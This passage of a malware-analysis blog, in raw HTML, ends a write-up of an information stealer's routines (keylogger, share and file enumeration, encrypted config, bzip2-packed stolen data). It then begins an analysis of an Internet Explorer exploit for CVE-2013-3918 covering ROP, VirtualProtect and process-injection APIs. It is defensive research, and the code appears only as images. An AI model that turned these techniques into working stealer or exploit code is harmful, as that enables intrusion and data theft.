<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22d: Routine 69h, retrieve various network information.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">67h @ 0x100052C3: Monitor keyboard strokes</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-UZGEGBTY7zt1hCf8uB7gI89Nkum-JIfK7OKGbAG5Rh8dJ1pb8dtad8W80qcgOZS92d9gdN8ftqbkLHew5YSnNztpayhsIfAhSDrkThR747DILRGiQTZzE3ceaWQ4AHcDb-lpQjl/s1600/routine_67.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-UZGEGBTY7zt1hCf8uB7gI89Nkum-JIfK7OKGbAG5Rh8dJ1pb8dtad8W80qcgOZS92d9gdN8ftqbkLHew5YSnNztpayhsIfAhSDrkThR747DILRGiQTZzE3ceaWQ4AHcDb-lpQjl/s320/routine_67.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22e: Routine 67h, the keylogger.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Ah @ 0x100057F5: Enumerate windows</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKCgwgJpAp8hrUAlPvI0jcaBdqGFksDsqQ_gM0UNdNkJHQw8cDzjWgP1WlbxYiEy-YB83jIr0cn6lADMd_9ybsAmgT1b-MUMO3KTJXcEIeqFIHuqaC8odA2M06iDliIsBwOKo3SPfY/s1600/routine_6a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKCgwgJpAp8hrUAlPvI0jcaBdqGFksDsqQ_gM0UNdNkJHQw8cDzjWgP1WlbxYiEy-YB83jIr0cn6lADMd_9ybsAmgT1b-MUMO3KTJXcEIeqFIHuqaC8odA2M06iDliIsBwOKo3SPfY/s320/routine_6a.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22f: Routine 6Ah, windows enumeration.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Bh @ 0x10005D06: Network file, shares and connection enumeration</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhBXhChKbfS6sCD6dhEzoUndz8THn5fbviUwh4mS9fG3ZOTbeuHZS1m7KCG1zZg7oSs2M-pSayVLxd7MbfRVqpuzJxk7-TiTxOjDPBizodP97L0sJ-6KprSl8uW8Ui2FlvbxDgJEu/s1600/routine_6b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhBXhChKbfS6sCD6dhEzoUndz8THn5fbviUwh4mS9fG3ZOTbeuHZS1m7KCG1zZg7oSs2M-pSayVLxd7MbfRVqpuzJxk7-TiTxOjDPBizodP97L0sJ-6KprSl8uW8Ui2FlvbxDgJEu/s320/routine_6b.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22g: Routine 6Bh, network share enumeration.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Dh @ 0x100069E5: List available files on all drives.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4JVQOmKxcKe6ntbRo5We01No7mG84eP3hD2XMA0c6BTJ3Vt0IFmQiHNadkfMPoyVmRbFMISqMq6bCw9p_nk99hxTDMkfEeJxwWTllhfHeQ0vmJVMMWfLHEtKniltGvjx4mfIPUEf_/s1600/routine_6d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4JVQOmKxcKe6ntbRo5We01No7mG84eP3hD2XMA0c6BTJ3Vt0IFmQiHNadkfMPoyVmRbFMISqMq6bCw9p_nk99hxTDMkfEeJxwWTllhfHeQ0vmJVMMWfLHEtKniltGvjx4mfIPUEf_/s320/routine_6d.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22h: Routine 6Dh, list all files on all drives.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Eh @ 0x10006CF5: Lists all servers that are visible in the domain.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHb_mvVgB5JfRBraxU8A8cEJnr0zn-ARguzDeVg0Z59Gn-L_WL4fjwoQIXre_3ywpCq085jHXvqRmcHs46_VHk0THE8BiJXw5QUsJ_wGptrm-E6VUPB0uH0X6391UCJRXUJiArN4hyphenhyphen/s1600/routine_6e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHb_mvVgB5JfRBraxU8A8cEJnr0zn-ARguzDeVg0Z59Gn-L_WL4fjwoQIXre_3ywpCq085jHXvqRmcHs46_VHk0THE8BiJXw5QUsJ_wGptrm-E6VUPB0uH0X6391UCJRXUJiArN4hyphenhyphen/s320/routine_6e.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22i: Routine 6Eh, enumerate servers visible in the domain.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Remember resource #201? Resource #201 is then decrypted in memory which serves as the default configuration file as to what stealing routines to be executed. The decryption routine used is clearly seen in Figure 23a.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrE5juNnhfa9GyIhBQZELYgablWTmQOwsi0tNV3bP5prZ5OXumpCmmgoLEGGjS5Ef8OtCC9S7usgocG02XXacRVzrMbcYYkV0sil0aOzIgQo-m2CBCMS2HW3YhaSJDMWm5xtoaNJO6/s1600/dec_config_file.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrE5juNnhfa9GyIhBQZELYgablWTmQOwsi0tNV3bP5prZ5OXumpCmmgoLEGGjS5Ef8OtCC9S7usgocG02XXacRVzrMbcYYkV0sil0aOzIgQo-m2CBCMS2HW3YhaSJDMWm5xtoaNJO6/s320/dec_config_file.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 23a: Decrypting config file located in resource #201.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The result of the decrypted configuration file can be seen in Figure 23b. The stealing routines are highlighted in red.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7LZ-_aGFT0y03cRoHpV_idyu4acjZOFDKQceZ2z4J-RVfvjCz7ZDFbMzKbmqmvXWUecA_SD39ozPJR-FjXZrRuHOCH7j0laSm38gaL0f577lFc3qdBq6n9cGPrKeNTHH_mzX5u05/s1600/dec_rsrc201.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7LZ-_aGFT0y03cRoHpV_idyu4acjZOFDKQceZ2z4J-RVfvjCz7ZDFbMzKbmqmvXWUecA_SD39ozPJR-FjXZrRuHOCH7j0laSm38gaL0f577lFc3qdBq6n9cGPrKeNTHH_mzX5u05/s320/dec_rsrc201.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 23b: Decrypted resource #201 which serves as the default config file.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">It uses 8 of the listed 9 routines based on its default configuration file. Routines used are 65h, 66h, 68h, 69h, 67h, 6Ah, 6Bh and 6Dh in that sequence. All stolen data are then compressed using bzip2 algorithm before writing to ~DQxx.tmp file. A string “AEh91AY&SY” is seen in the tmp file compared to the original bzip2 marker which is “BZh91AY&SY”.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeqjvBAT6sJbk2gIp1yZZtc8MGmAXiqKFyH9UtQoobnPzOt-iJLO3lqHkSQ-zIZIAxQPrGV3QFoP19DHta-PsORyXfSdPlU6yeWimfCdLkAaC0IiU01syJlXgbdvh-QfIiiI6kOWC/s1600/mod_bzip2_marker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeqjvBAT6sJbk2gIp1yZZtc8MGmAXiqKFyH9UtQoobnPzOt-iJLO3lqHkSQ-zIZIAxQPrGV3QFoP19DHta-PsORyXfSdPlU6yeWimfCdLkAaC0IiU01syJlXgbdvh-QfIiiI6kOWC/s320/mod_bzip2_marker.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 24: Modified AEh91AY&SY marker instead of the default BZh91AY&SY by bzip2.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> A sample of the encrypted stolen data and decrypted counterpart is posted below. A list of running processes with corresponding PIDs with account id is seen when fully decrypted.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=1227934427004236933" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHdp7OTHLzRdTf_fWUoIPGTsVvCLkZQKkZg0p8-w4plkXYJk4SQzrNBWAR_6HjKmjNcVstjFe7VqtrgeFDAEw58J-Fwf0rBtOwAYNk0fQl2ymHNPU_nzo2ae-EB_zFkuOkbTUpWUE/s1600/sample_data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHdp7OTHLzRdTf_fWUoIPGTsVvCLkZQKkZg0p8-w4plkXYJk4SQzrNBWAR_6HjKmjNcVstjFe7VqtrgeFDAEw58J-Fwf0rBtOwAYNk0fQl2ymHNPU_nzo2ae-EB_zFkuOkbTUpWUE/s320/sample_data.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 25: Left side encrypted bzip2 data, Right side decrypted data.</i></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i><br /></i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i><br /></i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>Analysis and Documentation Prepared By:</i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Christopher D. Del Fierro</i></span></span></div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-36690299938291666592013-11-13T01:56:00.000-08:002013-11-18T18:53:23.058-08:00CVE 2013 3918 - Another zero day?<div style="text-align: justify;">
Another HTML exploit has surfaced and made a scene on the AV industry this November 2013. An exploit that takes advantage of the vulnerability of an ActiveX component of Internet Explorer which allows code execution when a user views a specially crafted webpage. Details on the vulnerability can be found on this <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090" target="_blank">Microsoft website</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ThreatTrack's <i>Vipre 2013</i> detects this as Lookslike.HTML.CVE-2013-3918.a</div>
<div style="text-align: justify;">
<br />
The exploit uses a technique known as ROP (return-oriented-programming) that allows itself to run in non-executable memory areas. Once successfully exploited, it will intentionally exchange the address of the stack and heap and change the memory protection so that it can execute its shellcode. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUiU3VeGYIx4ziQe6wIJEQJxLrLbnFbh9Ft3P2PJ8JTxF2At5dpSuVvQO69FvSdfWHC3nYJaOKG1phZKCa4HhEpxVBaNvkukBUE-10cxmiVwMh4yqPEoYSklTK4PS8aG0_u5_LWANNMI4/s1600/overlfow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUiU3VeGYIx4ziQe6wIJEQJxLrLbnFbh9Ft3P2PJ8JTxF2At5dpSuVvQO69FvSdfWHC3nYJaOKG1phZKCa4HhEpxVBaNvkukBUE-10cxmiVwMh4yqPEoYSklTK4PS8aG0_u5_LWANNMI4/s400/overlfow.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<i>ROP in action</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In order to for it to execute, it changes the memory protection of the said area using VirtualProtect.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcj_Ry7F3Twg8XLpAi7RpJfveziA6pXR6492-w9ObgLUnzWqN9HGmiBOu-G6x-6hTEVdZ7egBWI8Lix1dY3Sd_M16NJaS-xk6eAE5WOl02x_AXWlxUOEIlVw2pCIrajaFfWOk4s2-Fyg/s1600/virtualprotectstack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcj_Ry7F3Twg8XLpAi7RpJfveziA6pXR6492-w9ObgLUnzWqN9HGmiBOu-G6x-6hTEVdZ7egBWI8Lix1dY3Sd_M16NJaS-xk6eAE5WOl02x_AXWlxUOEIlVw2pCIrajaFfWOk4s2-Fyg/s400/virtualprotectstack.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<i>Changes protection level of memory </i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Once everything is in order, it will pass execution to the part of its shellcode that decrypts and computes for the API's needed to inject itself to another process. </div>
<div style="text-align: left;">
<br /></div>
<ul>
<li>LoadLibraryA</li>
<li>Winexec</li>
<li>CreateThread</li>
<li>OpenProcess</li>
<li>CreateProcessA</li>
<li>VirtualAllocEx</li>
<li>WriteProcessMemory</li>
<li>CreateRemoteThread</li>
</ul>
<br />
<div style="text-align: left;">
It uses the said APIs to create a process named "rundll32" under Internet Explorer, writes another section of its shellcode and activates the process using CreateRemoteThread API. It's interesting to note that it covers itself with multiple layers of encryption and employs multiple jumps in memory to avoid easy detection.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4gcc7YndWnBGOSyu2wfIzyEF-X6Rm45C73eqJkJW6Z4viULwuxo-NXbFjM31Kn18BpGLU5OJHUsSkMmISWgSmoszxHPgzrHaowyyoYPSJ478d_6wEEr3EGnN8q3drVhpSqv2Ts3PlAl4/s1600/initialdecrypt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4gcc7YndWnBGOSyu2wfIzyEF-X6Rm45C73eqJkJW6Z4viULwuxo-NXbFjM31Kn18BpGLU5OJHUsSkMmISWgSmoszxHPgzrHaowyyoYPSJ478d_6wEEr3EGnN8q3drVhpSqv2Ts3PlAl4/s400/initialdecrypt.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>An example of decrypting code</i></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX_poW0ScpwgaCIBydKePEs2LIFDyaKd-6zTK0qssUlrQCQxoWxahT7GrLSKZXNV7GD7tbrrE6Dkt4jDkxzKjniyR0r8MCdqlIqC-r4YsePJrrl6AkmNj0WgjM0wZ_ONgQA7c8UvE5q8w/s1600/anotherdecrypt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX_poW0ScpwgaCIBydKePEs2LIFDyaKd-6zTK0qssUlrQCQxoWxahT7GrLSKZXNV7GD7tbrrE6Dkt4jDkxzKjniyR0r8MCdqlIqC-r4YsePJrrl6AkmNj0WgjM0wZ_ONgQA7c8UvE5q8w/s320/anotherdecrypt.jpg" width="320" /></a></div>
